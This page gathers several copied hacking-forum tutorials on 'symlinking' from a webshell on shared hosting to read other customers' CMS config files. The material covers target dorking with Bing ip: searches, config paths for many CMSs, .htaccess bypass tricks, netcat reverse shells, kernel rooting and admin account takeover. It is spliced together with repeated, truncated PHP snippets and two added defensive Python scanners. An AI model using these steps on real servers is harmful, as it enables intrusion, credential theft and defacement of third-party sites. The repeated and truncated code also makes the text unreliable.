Showing posts with label shmrilinking. Show all posts

Private Symlink(PHP) Exploit Tutorial

First of all, we use the symlink function to make a shortcut to any file or folder we want, which is why this function is very useful for reading any file or folder we want (for more info, use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the slave's database If and only if the slave is in a shared host


Download the below Shell & Follow the steps.

================================================================
Get Any C99 Shell
================================================================

/Step 1 $ Upload the PHP shell, i.e. Shell_Silic0n.php, to your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file . The path will look like

================================================================
http://www.yoursitename.com/shell_Silic0n.php
================================================================


/Step 3 $ The next step is to read the PHP eval code below carefully. It's about 10 lines of PHP code.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "

Symlink (PHP) Exploit

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tutorial Name: Symlink (PHP) Exploit [Private (PhP Code)For Sometimes]
Author: dREviL
*Don't share without credits*
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

First of all, we use symlink to read the config files of other sites hosted on the same server. Symlinking can be done by many methods, and today I will show a new one that was private for some time and is now shared. In this tutorial we will execute PHP (eval code) to symlink on a shared host. Let's begin. We need a shell that allows PHP eval code execution. First we get the full path of the root, /home/r00tb0x/public_html. And now the PHP code:
Code:
$filepath='/home/username/public_html/txtfile';
$sitepath='/home/edit/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "

How to symlink on a linux server [TuT] [Website hacking !!]

How to symlink ? (TUTORIAL)

Written by -ThatGuy- for beginner webhackers.

NOTE : I do not take any responsibility for your actions. This was written for educational purposes only ! Also sorry for my bad English !


Hello HackForums.
Today I'll try to help beginner webhackers by teaching them a method called symlink.

What is symlink ?
Symlink is a method used by hackers to read files from other users on a linux server, only by using a php-shell.

So what do we require to start the tutorial :

Requirements :

- a phpshell uploaded in a linux server (Safe MODE = OFF )
- a target site
- basic phpshell & linux knowledge
- a brain !

Let's start by the tutorial.

Where to get a target, if you only have a phpshell uploaded in a linux server that has some sites ?
It's easy , first get the IP of the server.
Then go to bing.com and search like that :
Code:
ip:xx.xxx.xxx.xxx vbulletin
Replace xxx with the IP address of the server, and 'vbulletin' you can change to the name of a forum software or a CMS you wish as a target. But for this example I'll take vBulletin.

OK , now we got the target site , let's suppose that its domain name is mytarget.com and it uses vBulletin forum software.

Now starts the real hacking !

Go to your phpshell , and in the 'Execute command' field , execute there that command :
Code:
ls -la /etc/valiases/mytarget.com
By executing this command , i'll get the name of the user (on the linux server) that keeps the website mytarget.com.
It should return with a result similar to that :

>>>>>>>-rw-r--r-- 1 target mail 28 May 28 2011 /etc/valiases/mytarget.com

The red colored piece is the user of mytarget.com on the server.
So in our case the username is 'target'

Many of us know that the configuration file of vBulletin script ,can be found in /includes/config.php.
This is the file we need to read in our case , in order to get access at our target site.
How can we read that file ?
Simple , execute that command on the shell :
Code:
ln -s /home/target/public_html/includes/config.php symlink.txt
As you can see, we're writing the content of config.php into the symlink.txt file.
After you execute the command, you will see a new file called symlink.txt.
Open it and w00t !! You successfully read the configuration file (symlinked).
Now, just get a MySQL connector script coded in PHP, and log in with the details you get from the configuration file of your target. Then, at the admin table, get the admin's hash and crack it, or better, change the admin's email to yours, and then do a forgot password at mytarget.com
And then you successfully will get full access in your target site !

That was all ,very easy if you practice many times. Maybe soon i will make a video tutorial if you still didn't understand , just request the video tut in the comments , and i will try ASAP to make it for you !

Thanks for reading , -ThatGuy- !
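
Every variant of this technique leaves the same artifact on disk: a symbolic link inside one account's web root whose target resolves into another account's home or to /. The Python audit below is an added example for hosting administrators, not part of the original post; the function names, the /home/<account>/public_html layout default and the constructed demo tree (accounts attacker1 and victim1, names borrowed from elsewhere on this page) are assumptions.

```python
import os
import tempfile

def find_escaping_symlinks(home_root, docroot="public_html"):
    """Return (account, link_path, resolved_target) for each symlink under
    <home_root>/<account>/<docroot> that resolves outside that account's home."""
    findings = []
    for account in sorted(os.listdir(home_root)):
        home = os.path.realpath(os.path.join(home_root, account))
        web = os.path.join(home, docroot)
        if not os.path.isdir(web):
            continue
        # followlinks=False: a link to a directory is reported, never descended into
        for dirpath, dirnames, filenames in os.walk(web, followlinks=False):
            for name in sorted(dirnames + filenames):
                path = os.path.join(dirpath, name)
                if not os.path.islink(path):
                    continue
                target = os.path.realpath(path)
                if os.path.commonpath([home, target]) != home:
                    findings.append((account, path, target))
    return findings

def build_constructed_tree(root):
    """Constructed sample layout (not real data): two hosting accounts."""
    home_root = os.path.join(os.path.realpath(root), "home")
    victim_cfg = os.path.join(home_root, "victim1", "public_html", "includes", "config.php")
    web = os.path.join(home_root, "attacker1", "public_html")
    os.makedirs(os.path.dirname(victim_cfg))
    os.makedirs(os.path.join(web, "hack"))
    for path in (victim_cfg, os.path.join(home_root, "attacker1", "notes.txt")):
        with open(path, "w") as fh:
            fh.write("constructed placeholder\n")
    os.symlink(victim_cfg, os.path.join(web, "victim1.txt"))    # cross-account link
    os.symlink("/", os.path.join(web, "hack", "root"))          # link to filesystem root
    os.symlink("../notes.txt", os.path.join(web, "notes.txt"))  # stays inside own home
    return home_root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for account, link, target in find_escaping_symlinks(build_constructed_tree(tmp)):
            print(f"{account}: {link} -> {target}")
```

A link that stays inside its owner's home is not reported, which keeps ordinary site-internal symlinks out of the results.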

shrimlinking

++ ++
~*^...Symlink(PHP) Exploit Tutorial by Indian Cyber Army...^*~
++ ++

First of all, we use the symlink function to make a shortcut to any file or folder we want, which is why this function is very useful for reading any file or folder we want (for more info, use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the slave's database If and only if the slave is in a shared host

Download the below Shell & Follow the steps.

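================================================================
Get Any C99 Shell
================================================================

/Step 1 $ Upload the PHP shell, i.e. Shell_ica.php, to your root path. That is /home/hackerz/public_html .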

/Step 2 $ Open the uploaded file . The path will look like

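================================================================
http://www.yoursitename.com/shell_ica.php
================================================================

/Step 3 $ The next step is to read the PHP eval code below carefully. It's about 10 lines of PHP code.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!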

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "

Symlink Tutorial

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+]Tutorial Name: How To Symlink +
[+]Tutorial By dR.EviL +
[+]Written For # Members +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#]Tools For This Tutorial +
[+]A Shell Uploaded In The Server +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Symlink is used to get admin access to your target website hosted on the same server. With symlink you can bypass the security of the server and read the files of other users on the Linux server. So if we have uploaded a shell on the server of the target website, but under another user, we can easily read the configuration file of our target. First, a shell is needed to symlink.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

First Step Is To Get the user name of the target website on the server. To do this, execute this command
Code:
ls -la /etc/valiases/target.com ( Replace target.com with your target)

The Result Will Be :

Code:
target mail 15 jun 06 2011 /etc/valiases/the username of target.com
The Second Step Is:
Finding The configuration file :(
Below are Some Directions For Config Files In Different Cms..
Code:
In Joomla The Config File Will Be At /home/target/public_html/configuration.php
In WordPress The Config Will Be At /home/target/public_html/wp-config.php
In vBulletin The Config Will Be At /home/target/public_html/includes/config.php

Symliking In Joomla
Now we have to read the config file to get the admin panel ! Follow these steps:
1- Create a text file in your shelled website example: AL.txt
2- Then go to command execution field and execute that command :
Code:
ln -s /the target of config file AL.txt
examples:
ln -s /home/target/public_html/configuration.php AL.txt
ln -s /home/target/public_html/includes/config.php AL.txt
ln -s /home home/target/public_html/wp-config.php AL.txt
After you execute that command , just read the file AL.txt !
There is written the configuration file of ur target ! Get there the SQL database logins , and then manage its database , upload a MYSQL interface Then the MySQL database of the target website is in ur hands
If you wanna get into its administration , just edit some values there !

From vuln site to symlink

Now,first free ur time before reading this tutorial.This is a big tutorial ..so that u can learn and hack everything.

1. Introduction.
Most of the hackers who deface websites are script-kiddies, we're now going to take a look how hackers quickly detect vulnerable websites and deface other domains on the system.


2. SQL Injection.
Many people would take as a main the SQL Injection (SQLi) attack. SQLi is very popular and there are many dorks out there.


2.1 Searching for vulnerable websites.
The search is very easy. We just put the dork and try different search results. For quicker results you may use the exploit scanner.

2.2 I want to attack a specific website which is on a shared hosting.
Again the search is very easy. Let's say we have the IP 69.162.119.226 with no malicious thoughts on it, of course. We navigate to:

http://www.bing.com

In the search field write:

Code:
ip:69.162.119.226 id=


You should get very interesting results which you might attack.


3. Attacking the web application itself.

A very good method to gain access is to attack the web application itself. Even if the website's web application is up to date and you aren't able to exploit it, you can search for vulnerable web applications on the server itself. We'll be using the same method as in 2.2 .

Let's say we have again the IP 69.162.119.226 with no malicious thoughts on it, of course. We navigate to:

http://www.bing.com

In the search field write:

Code:
ip:69.162.119.226 "wordpress"


You should get websites powered by wordpress or any other system you have a working exploit on.

4. I've got admin access, now what ?

After you've got admin access, upload a shell.

5. I've got a shell, now what ?

Now it's time to take down your target. You can either:
- Root the server.
- Get the victims' website configuration database.


5.1 Rooting the server.
First we need to disable the security. There is a good tutorial in this forum, follow it and you'll be fine.

Second we need a back-connection OR we can bind a port. A back connection means that the server connects to you after you have opened the specific port and have launched netcat to listen ( nc -l -v -p PORT ) . Locus shell provides a great interface for beginners. Just upload locus, after which go to back-connection OR bind shell and follow the instructions.


5.1.1 Pwning the kernel.
One of the most popular ways to root a web server is by pwning the kernel if it's a Linux box. To find out the kernel version simply type "uname -a" on your back/bind connection to/from the server. After you've got the version try finding a local root exploit for it. If you can't find, don't give up ... try harder ...

Code:
http://www.exploit-db.com/local/



5.1.2 Getting the victims' database configuration file.

Many of you have heard of "symlinking". This is actually something like a shortcut on the Windows OS, except this term is used in the Linux/Unix distributions. Symlinking is a necessity in order for the Linux/Unix box to run about 10 times faster. Without it the server will be really slow even with high hardware configuration, which is just pointless.

To get the configuration file, first find out what system the slave is using ( e.g. Wordpress, Joomla, vBulletin etc ). Now go to your shell ( you will have to have disabled the security ) and type in "cat etc/passwd" .

The etc/passwd file contains all usernames on the Linux/Unix box which are created when you get hosting ( usually that's the cpanel username ). Now to get this file you will have to have disabled the security. In this file the usernames aren't as long as the domain ones, for e.g.

You have slave website hackers1.com
In etc/passwd this can refer to the username:
hack1, hak1, hac1, hckrs1, hrs1 etc

So spend some time figuring out the username. After you've got it it's time to get the database config file. You can see the default configuration files list here:

Code:
vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php


After you've got your path, it's time to extract the db information.

Let's assume you're in directory /home/attacker1/public_html/shell.php , where shell.php is your shell and attacker1 is the username of some domain we've just compromised. Doesn't this ring the bell ? The path to the victims' hosting should be /home/victim1/public_html/ where victim1 is your victims' username. Let's execute this command on our shell, assuming the victims' system is vBulletin :

Code:
ln -s /home/victim1/public_html/includes/config.php victim1.txt


This command uses symlink and it tells the server "hey, give me the file /config.php and save it as victim1.txt" (symlinking) . Now when you navigate to attacker1.com/victim1.txt you should have their configuration file. Many administrators put some security on their forums/cmses so we're going to break them now ...


5.1.2.1 Htaccess.

The admin of the victim1.com website might have put this htaccess file in the /includes folder:


order allow,deny
deny from all


When we try to symlink this it will return in a 403 Forbidden Error. So how do we bypass this ? Easy. We create a folder e.g. "hack" . We navigate to "hack" by typing "cd /hack". Next we symlink like this:

Code:
ln -s /home/victim1/public_html/includes/config.php victim1.txt


and we get a 403 Forbidden error ... Now we put this htaccess file in a directory before "hack", for example we are in "/home/attacker1/public_html/hack" and we have to put this htaccess file (below) in "/home/victim1/public_html/" . The htaccess file you have to put:

Code:
HeaderName victim1.txt


Now we navigate to "/home/attacker1/public_html/hack" and click "victim1.txt" and it should load us the configuration file. If you have done a symlink but with a different .txt file, replace your custom name in the htaccess as well e.g. I have done symlink:

Code:
ln -s /home/victim1/public_html/includes/config.php 1.txt


so I have to put htaccess:

HeaderName 1.txt


5.1.2.2 Browse Through Attack - Bypassing ALL Security.

Tired of bypassing everything step by step by step ? Now I'm going to show you a very cool method to bypass ALL security.

Take this scenario as example:

We have disabled all security. But still we can't symlink right. What do we do ?

First we create a folder with a custom named folder like "hack". We enter it via our shell and type in "ln -s / root" . Next we choose a slave domain like victim1.com . We type in " ls -la /etc/valiases/victim1.com ". Now we navigate one folder back and put this htaccess file in the "hack" folder:

Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .php
AddHandler txt .php

Now if we are in "/home/attacker1/public_html/" this equals to "attacker1.com" . So we want to navigate to the "hack" folder and we type in the URL "attacker1.com/hack" and we see a "folder" which actually is a symlink called "root". Don't get too happy, we still have got restricted permissions to some folders. Now to "browse through" their whole hosting space we just navigate to "attacker1.com/hack/root/home/victim1/public_html/".

Fr34k1ng pwn3d . Now you can browse through his website without worrying about IP restrictions with htaccess file. Although if there is htaccess because of which you have to enter username and password, you have to find a way to bypass that yourself. OK so you're browsing through and you are in "/includes/" and you find "config.php". You click on it but it gives you a BLANK page. WTF ?! Not exactly. Right-click and select "view source" and the configuration file is there .


6. Is this is it ? Is it really this simple ?

Yes, this is it, nothing complicated. This is the way most hackers "deface", "root" or whatever they do to websites/forums.

````````````````````````````````````````````````````````````````
now dont comment like 'cant understand ' ....read the tut again and again,u ill understand..


i hope all like this tutorial....rep if u like

Thanks to hackforums

if u put this tut anywhere,plz give credits..
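
The per-directory overrides quoted in sections 5.1.2.1 and 5.1.2.2 (Options Indexes FollowSymLinks, AddType/AddHandler remapping .php to txt, HeaderName) are distinctive enough to search for in customer .htaccess files. The scanner below is an added example for hosting administrators, not part of the original tutorial; the rule labels, function name and sample file are constructed for illustration.

```python
import re

OPTIONS_RE = re.compile(r"^\s*Options\s+(.*)$", re.I)
MIME_RE = re.compile(r"^\s*(AddType|AddHandler)\s+(\S+)\s+(.+)$", re.I)
HEADERNAME_RE = re.compile(r"^\s*HeaderName\s+(\S+)", re.I)

def scan_htaccess(text):
    """Return (line_number, rule, line) for directives matching the overrides
    quoted in the tutorial; rule names are labels invented for this example."""
    hits = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = OPTIONS_RE.match(line)
        if m:
            for token in m.group(1).split():
                if token.startswith("-"):
                    continue  # option is being switched off
                name = token.lstrip("+").lower()
                if name in ("followsymlinks", "indexes"):
                    hits.append((lineno, "options-" + name, line))
            continue
        m = MIME_RE.match(line)
        if m:
            value, exts = m.group(2).lower(), m.group(3).lower().split()
            # .php mapped to a type/handler that is not PHP: source is sent as text
            if "php" not in value and any(e.lstrip(".").startswith("php") for e in exts):
                hits.append((lineno, "php-served-as-text", line))
            continue
        if HEADERNAME_RE.match(line):
            hits.append((lineno, "headername", line))
    return hits

# Constructed sample: the directives quoted above plus two benign lines.
CONSTRUCTED_HTACCESS = "\n".join([
    "# constructed sample",
    "Options Indexes FollowSymLinks",
    "DirectoryIndex test.htm",
    "AddType txt .php",
    "AddHandler txt .php",
    "HeaderName victim1.txt",
    "AddHandler application/x-httpd-php .php",
    "Options -FollowSymLinks +SymLinksIfOwnerMatch",
])

if __name__ == "__main__":
    for lineno, rule, line in scan_htaccess(CONSTRUCTED_HTACCESS):
        print(f"line {lineno}: {rule}: {line}")
```

A hit is a prompt for review rather than proof of compromise, since Options Indexes in particular also appears on legitimate sites.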